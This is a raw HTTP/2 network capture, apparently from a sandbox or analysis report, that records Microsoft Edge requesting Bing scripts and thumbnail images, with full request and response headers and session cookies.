alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626dd07
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/R_rYK_qaMtV4wMhK7ShAxVvSe_s.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: PNDy9gq2IMe+DCw9vyzalw==
last-modified: Wed, 24 Jan 2024 22:29:15 GMT
etag: 0x8DC1D2BE5D9F458
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6ae0a923-401e-00a5-46d0-631350000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=82232
expires: Fri, 01 Mar 2024 14:22:22 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626df8a
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/NLI5XRtpCK_NYPks3Y5xU5ORkeQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: vJ+qi7aq5od2ay2y4FWklA==
last-modified: Wed, 24 Jan 2024 22:29:15 GMT
etag: 0x8DC1D2BE5EE9DA4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: cf5f6b62-101e-0011-186e-4fdf9e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 76940
akamai-grn: 0.0cfd4817.1707840610.4fbdd0ad
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
vary: Accept-Encoding
cache-control: public, no-transform, max-age=57896
expires: Fri, 01 Mar 2024 07:36:46 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626e0b0
timing-allow-origin: *
-
GEThttps://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=18&h=18&o=6&pid=AdsPlusmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=18&h=18&o=6&pid=AdsPlus HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 738
cache-control: public, max-age=1821231
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MEM_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c3e
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.451432e1-0a00-4505-8e75-ca1f125a3396&w=18&h=18&o=6&pid=AdsPlusmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.451432e1-0a00-4505-8e75-ca1f125a3396&w=18&h=18&o=6&pid=AdsPlus HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 762
cache-control: public, max-age=255499
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (A)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c3f
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.05409d17-5d83-4701-acc1-90430dd3b02c&w=16&h=16&o=6&pid=1.2msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.05409d17-5d83-4701-acc1-90430dd3b02c&w=16&h=16&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 712
cache-control: public, max-age=2088317
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MEM_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c42
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.1e0df9ff-b013-45f3-b7aa-950120bda86e&w=16&h=16&o=6&pid=1.2msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.1e0df9ff-b013-45f3-b7aa-950120bda86e&w=16&h=16&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 637
cache-control: public, max-age=615284
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MEM_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c43
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.b5fb1f64-8ad9-4d0c-991d-7ec0bd490bf8&w=16&h=16&o=6&pid=1.2msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.b5fb1f64-8ad9-4d0c-991d-7ec0bd490bf8&w=16&h=16&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 531
cache-control: public, max-age=2088485
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MEM_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c44
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.12ea9a8d-aac8-43e3-812a-24b84af616a9&w=16&h=16&o=6&pid=1.2msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.12ea9a8d-aac8-43e3-812a-24b84af616a9&w=16&h=16&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 944
cache-control: public, max-age=514447
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c45
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.05409d17-5d83-4701-acc1-90430dd3b02c&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.05409d17-5d83-4701-acc1-90430dd3b02c&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2342
cache-control: public, max-age=1058453
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c49
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.2acc523d-5e45-4766-b29b-968f9adc60df&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.2acc523d-5e45-4766-b29b-968f9adc60df&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6066
x-check-cacheable: YES
cache-control: public, max-age=956924
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c4d
-
GEThttps://th.bing.com/th?id=OIP.NgA3ftBHZZOqthvN4Bup8wAAAA&w=80&h=80&c=1&vt=10&bgcl=0221d8&r=0&o=6&pid=5.1msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OIP.NgA3ftBHZZOqthvN4Bup8wAAAA&w=80&h=80&c=1&vt=10&bgcl=0221d8&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 4644
cache-control: public, max-age=484828
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c50
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=ODLS.998e508e-77a2-4745-89dd-afc5d29468e1&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.998e508e-77a2-4745-89dd-afc5d29468e1&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5921
x-check-cacheable: YES
cache-control: public, max-age=426678
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c53
-
GEThttps://th.bing.com/th?id=ODLS.c7d54ab5-176a-431d-ab18-1bfc7ead56b3&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=ODLS.c7d54ab5-176a-431d-ab18-1bfc7ead56b3&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 865
cache-control: public, max-age=1025948
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c5c
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=OVP.GVIrZLFhm9LS2w1ROl-_nQEsDh&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OVP.GVIrZLFhm9LS2w1ROl-_nQEsDh&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
